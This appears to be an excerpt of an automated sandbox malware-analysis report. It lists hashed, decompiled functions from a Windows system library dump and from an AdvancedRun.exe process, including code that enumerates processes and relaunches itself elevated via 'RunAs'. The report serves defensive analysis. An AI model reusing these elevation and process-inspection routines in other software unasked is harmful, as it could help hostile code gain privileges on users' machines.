                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireReleasememcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 753335654-0
                                                                                                                            • Opcode ID: 0f95570448b49d507809489683f4053aa8323ce777ee0209b55319770bdcdf58
                                                                                                                            • Instruction ID: 5d9a9441586273e61a1dd6f1ac516b22e3ef40ddf47cd23b99b017f8ee287d2b
                                                                                                                            • Opcode Fuzzy Hash: 0f95570448b49d507809489683f4053aa8323ce777ee0209b55319770bdcdf58
                                                                                                                            • Instruction Fuzzy Hash: A031C476A0850AABC715CF68C8C0AE6F3F9FF44B14B04C56DE85D9B281DB38E946C794
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8050, Relevance: 6.1, APIs: 4, Instructions: 78threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C86C4,00000008,?,00000000,00000008,?,6B22F8D6,?,00000000,00000000,?,6B1D22D2,00000000,?,00000000,00000034), ref: 6B2A80AA
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C86C4,6B2C86C4,00000008,?,00000000,00000008,?,6B22F8D6,?,00000000,00000000,?,6B1D22D2,00000000,?,00000000), ref: 6B2A80DD
                                                                                                                            • TpSetPoolMaxThreads.1105(00000000,00000000,6B2C86C4,6B2C86C4,00000008,?,00000000,00000008,?,6B22F8D6,?,00000000,00000000,?,6B1D22D2,00000000), ref: 6B2A80F3
                                                                                                                            • TpSetPoolMaxThreadsSoftLimit.1105(00000000,00000000,00000000,00000000,6B2C86C4,6B2C86C4,00000008,?,00000000,00000008,?,6B22F8D6,?,00000000,00000000), ref: 6B2A80FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLockPoolThreads$AcquireLimitReleaseSoft
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4208054433-0
                                                                                                                            • Opcode ID: fb290ec79afa35727ff920b80d02825600403babe0e5c5d9b4a97473be05fb2b
                                                                                                                            • Instruction ID: 43865d17e2679f448730ca7b8dd8ceb0cc0c85bdbef35085039dd0679b4e5671
                                                                                                                            • Opcode Fuzzy Hash: fb290ec79afa35727ff920b80d02825600403babe0e5c5d9b4a97473be05fb2b
                                                                                                                            • Instruction Fuzzy Hash: E7112972F015AE6787109A394CD0E5BBBE59B85786B110279EE14FF380EB3DCD0186E1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B262D0B, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockShared.1105(?,00000000,00000000,00000008,?,?,6B22FFD2,00000000,?,00000000,00000000,00000000,00001030,000000FF,?,00000000), ref: 6B262D24
                                                                                                                            • RtlAcquireSRWLockShared.1105(0000000C,?,00000000,00000000,00000008,?,?,6B22FFD2,00000000,?,00000000,00000000,00000000,00001030,000000FF,?), ref: 6B262D3C
                                                                                                                              • Part of subcall function 6B1FFAD0: RtlDllShutdownInProgress.1105(00000000), ref: 6B1FFB35
                                                                                                                              • Part of subcall function 6B1FFAD0: ZwWaitForAlertByThreadId.1105(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6B1FFBE3
                                                                                                                            • RtlReleaseSRWLockShared.1105(0000000C,0000000C,?,00000000,00000000,00000008,?,?,6B22FFD2,00000000,?), ref: 6B262D6A
                                                                                                                            • RtlReleaseSRWLockShared.1105(?,?,00000000,00000000,00000008,?,?,6B22FFD2,00000000,?,00000000,00000000,00000000,00001030,000000FF,?), ref: 6B262D95
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LockShared$AcquireRelease$AlertProgressShutdownThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 276812241-0
                                                                                                                            • Opcode ID: 88c711f399ab054d4a243af5ccd3d7021e5bd3733a9592a8f7d2f43ce671963a
                                                                                                                            • Instruction ID: 6493f817ae8d04747b6217cba0345e4e4c7ac550c762540641abdf3e3fd20dc4
                                                                                                                            • Opcode Fuzzy Hash: 88c711f399ab054d4a243af5ccd3d7021e5bd3733a9592a8f7d2f43ce671963a
                                                                                                                            • Instruction Fuzzy Hash: F811E9B190060EAFCB30CB55C4C499AB3FDFB85399B10845ED65D97240E779ED8AC790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FE63F, Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlSetThreadWorkOnBehalfTicket.1105(?,?,?), ref: 6B1FE68B
                                                                                                                            • TpCallbackMayRunLong.1105(?,?,?), ref: 6B1FE6A3
                                                                                                                            • RtlActivateActivationContextUnsafeFast.1105(?,?,?,?,?,6B209688,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6B22E258
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ActivateActivationBehalfCallbackContextFastLongThreadTicketUnsafeWork
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3384506009-0
                                                                                                                            • Opcode ID: 09daa6f13e10e10deb403ab3800f05a1ef34cbce950abe0e6d2b8a8228a42360
                                                                                                                            • Instruction ID: 9bff4cb7d72045119988f569f1fabe80129d8e5fb513e89da828d2b2bcb20843
                                                                                                                            • Opcode Fuzzy Hash: 09daa6f13e10e10deb403ab3800f05a1ef34cbce950abe0e6d2b8a8228a42360
                                                                                                                            • Instruction Fuzzy Hash: F8012632564704AFC720CF69C8C4B43B7ECEF86739F100669D9558B180E779E982CB84
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B288061, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 402COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: xl--$xn--
                                                                                                                            • API String ID: 0-2182639396
                                                                                                                            • Opcode ID: 97de383d1438512099ca62000ce1e952c0f54874c07b6dca1d134b5263d9167a
                                                                                                                            • Instruction ID: a26c449a955117f04f614ad96b16812f9ae4f427adc30581b4a335e2efbf42d5
                                                                                                                            • Opcode Fuzzy Hash: 97de383d1438512099ca62000ce1e952c0f54874c07b6dca1d134b5263d9167a
                                                                                                                            • Instruction Fuzzy Hash: EBE17171E0025E9FDF15CFA8C8C06ADB7F2BF84311F24846AD955AF2C0E77899498B51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F1F30, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlxOemStringToUnicodeSize.1105(?,?,00000000,?,00000001,?,?,?,?,?,6B2217F0,6B2AFC68,000000FE,?,6B253D77,?), ref: 6B23CEE2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: RtlxSizeStringUnicode
                                                                                                                            • String ID: w=%k
                                                                                                                            • API String ID: 2371059093-3381418445
                                                                                                                            • Opcode ID: 577a9f7ea69f03ce5b6a81964d6e2ff84e08aff8f25de43e1802c920634bf70d
                                                                                                                            • Instruction ID: af1e8e4b8691c5d599f2072ed3c3ca9f3983ba699558d6881cb35838b29780b3
                                                                                                                            • Opcode Fuzzy Hash: 577a9f7ea69f03ce5b6a81964d6e2ff84e08aff8f25de43e1802c920634bf70d
                                                                                                                            • Instruction Fuzzy Hash: F4519FB5C042699FDB11CF59C480AAEFBF8FF49B14F10416EE855A7250D7399842CBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FDD82, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 162COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C7B60,?,?,?,?,?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 6B1FDED2
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C7B60,?,?,?,00000000,?,?,?,00000000,?,00000000,?,?,?,00000000,?), ref: 6B1FDF06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                            • String ID: `{,k
                                                                                                                            • API String ID: 3168844106-2711059664
                                                                                                                            • Opcode ID: cd2f3e7f04e802fcf4f9761c5bf5d7b914ccf286156f0f731a3b606b2ad8bcb8
                                                                                                                            • Instruction ID: 97000b12b3bbc57ed228becfb82493a86490707e11a05fa9fb1556db68098c9a
                                                                                                                            • Opcode Fuzzy Hash: cd2f3e7f04e802fcf4f9761c5bf5d7b914ccf286156f0f731a3b606b2ad8bcb8
                                                                                                                            • Instruction Fuzzy Hash: DC5125B1945605EFC318CF29D480A55BBFABF5A319B25C5AED018CB352E735E883CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E3AD2, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: MUI
                                                                                                                            • API String ID: 0-1339004836
                                                                                                                            • Opcode ID: 14afffe5e6ea27eda8e21a2fd2ce12e9af236179593101907a770989684e8188
                                                                                                                            • Instruction ID: 4e99856b388c056ae34559789f1e0ae262a74a904d17b00be3d4d674931b27fa
                                                                                                                            • Opcode Fuzzy Hash: 14afffe5e6ea27eda8e21a2fd2ce12e9af236179593101907a770989684e8188
                                                                                                                            • Instruction Fuzzy Hash: 9331AF70A0452AABCB10DF99C8C09AEF7F9BF45741F51819ADC91DF241E778D982C7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E3B30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlLcidToLocaleName.1105(?,?,00000002,00000000,C0000034,00000000,?,?,?,00000000,00000001,00000000,00000000), ref: 6B1E3B76
                                                                                                                            • RtlInitUnicodeString.1105(?,MUI,C0000034,00000000,?,?,?,00000000,00000001,00000000,00000000), ref: 6B1E3BC8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitLcidLocaleNameStringUnicode
                                                                                                                            • String ID: MUI
                                                                                                                            • API String ID: 1552940156-1339004836
                                                                                                                            • Opcode ID: a61a71190021bdf3f5eab2ac6b22b831e545143ad3a9d1f58da0d755ae713f96
                                                                                                                            • Instruction ID: bf4d1424f2e8819f315a17b37a3bcee9af648ca5462ad4a2617ae63ed971b515
                                                                                                                            • Opcode Fuzzy Hash: a61a71190021bdf3f5eab2ac6b22b831e545143ad3a9d1f58da0d755ae713f96
                                                                                                                            • Instruction Fuzzy Hash: 0021D474A01A156BC321DE15D481D7BF3E8EF94761B00815EEC5A8B220E734D883C7B0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B25F2B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcsicmp.1105(?,?,-00000054,-00000054,00000000), ref: 6B25F2FB
                                                                                                                            • DbgPrint.1105(AVRF: pid 0x%X: found dll descriptor for `%ws' with verified exports ,?,?,-00000054,-00000054,00000000), ref: 6B25F323
                                                                                                                            Strings
                                                                                                                            • AVRF: pid 0x%X: found dll descriptor for `%ws' with verified exports , xrefs: 6B25F31E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print_wcsicmp
                                                                                                                            • String ID: AVRF: pid 0x%X: found dll descriptor for `%ws' with verified exports
                                                                                                                            • API String ID: 2655330621-555053354
                                                                                                                            • Opcode ID: e9d3ca0460658806f27bd1176ba0cc188355440cd59d9a9619ba2fc3c542113b
                                                                                                                            • Instruction ID: f9e42df32be79213e68f5cac2560492ca2c5111c9a88fb1bd0437a0eb172e0ed
                                                                                                                            • Opcode Fuzzy Hash: e9d3ca0460658806f27bd1176ba0cc188355440cd59d9a9619ba2fc3c542113b
                                                                                                                            • Instruction Fuzzy Hash: B621CD3390024DEBEB11CF54C9C8B9AB7F1BB85325F2541A8C8582B290D339AD61CB82
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: AdvancedRun.exe PID: 400 Parent PID: 6148 AdvancedRun.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}































                                                                                                                            0x00409609
                                                                                                                            0x0040960f
                                                                                                                            0x00409619
                                                                                                                            0x00409623
                                                                                                                            0x0040962e
                                                                                                                            0x00409633
                                                                                                                            0x00409640
                                                                                                                            0x0040964a
                                                                                                                            0x00409782
                                                                                                                            0x0040978c
                                                                                                                            0x00409793
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040965a
                                                                                                                            0x0040965f
                                                                                                                            0x00409678
                                                                                                                            0x0040967e
                                                                                                                            0x00409681
                                                                                                                            0x00409685
                                                                                                                            0x00409688
                                                                                                                            0x004096b2
                                                                                                                            0x004096bf
                                                                                                                            0x004096c6
                                                                                                                            0x004096cb
                                                                                                                            0x004096da
                                                                                                                            0x004096e6
                                                                                                                            0x0040973b
                                                                                                                            0x00409747
                                                                                                                            0x0040975f
                                                                                                                            0x00409764
                                                                                                                            0x0040976a
                                                                                                                            0x00409770
                                                                                                                            0x00409773
                                                                                                                            0x0040977d
                                                                                                                            0x00000000
                                                                                                                            0x0040977d
                                                                                                                            0x004096ee
                                                                                                                            0x004096f5
                                                                                                                            0x004096fc
                                                                                                                            0x00409704
                                                                                                                            0x0040970c
                                                                                                                            0x0040971c
                                                                                                                            0x0040971c
                                                                                                                            0x00409704
                                                                                                                            0x00409721
                                                                                                                            0x00409728
                                                                                                                            0x00409739
                                                                                                                            0x00409739
                                                                                                                            0x00000000
                                                                                                                            0x00409728
                                                                                                                            0x00409693
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004096a5
                                                                                                                            0x004096a9
                                                                                                                            0x004096ac
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004096ac
                                                                                                                            0x004097a6

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                            • memset.MSVCRT ref: 0040962E
                                                                                                                            • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                            • memset.MSVCRT ref: 004096C6
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                            • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                            • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                            • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                            • API String ID: 239888749-1740548384
                                                                                                                            • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                            • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                            • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                            • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                                                                            0x00401c31
                                                                                                                            0x00401c33
                                                                                                                            0x00401c48
                                                                                                                            0x00401c4f
                                                                                                                            0x00401c61
                                                                                                                            0x00401c68
                                                                                                                            0x00401c74
                                                                                                                            0x00401c79
                                                                                                                            0x00401c7a
                                                                                                                            0x00401c7b
                                                                                                                            0x00401c84
                                                                                                                            0x00401c89
                                                                                                                            0x00401c8e
                                                                                                                            0x00401c8f
                                                                                                                            0x00401c9b
                                                                                                                            0x00401ca6
                                                                                                                            0x00401caf
                                                                                                                            0x00401cb9
                                                                                                                            0x00401cc0
                                                                                                                            0x00401cc7
                                                                                                                            0x00401cce
                                                                                                                            0x00401cd5
                                                                                                                            0x00401cdd
                                                                                                                            0x00401ce0
                                                                                                                            0x00401d14
                                                                                                                            0x00401ce2
                                                                                                                            0x00401ce8
                                                                                                                            0x00401cf3
                                                                                                                            0x00401cf6
                                                                                                                            0x00401cfe
                                                                                                                            0x00401d09
                                                                                                                            0x00401d09
                                                                                                                            0x00401cfe
                                                                                                                            0x00401d1b

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                            • memset.MSVCRT ref: 00401C4F
                                                                                                                            • memset.MSVCRT ref: 00401C68
                                                                                                                              • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                            • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                            • memset.MSVCRT ref: 00401C9B
                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                            • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                            • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                            • API String ID: 903100921-3385179869
                                                                                                                            • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                            • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                            • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                            • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
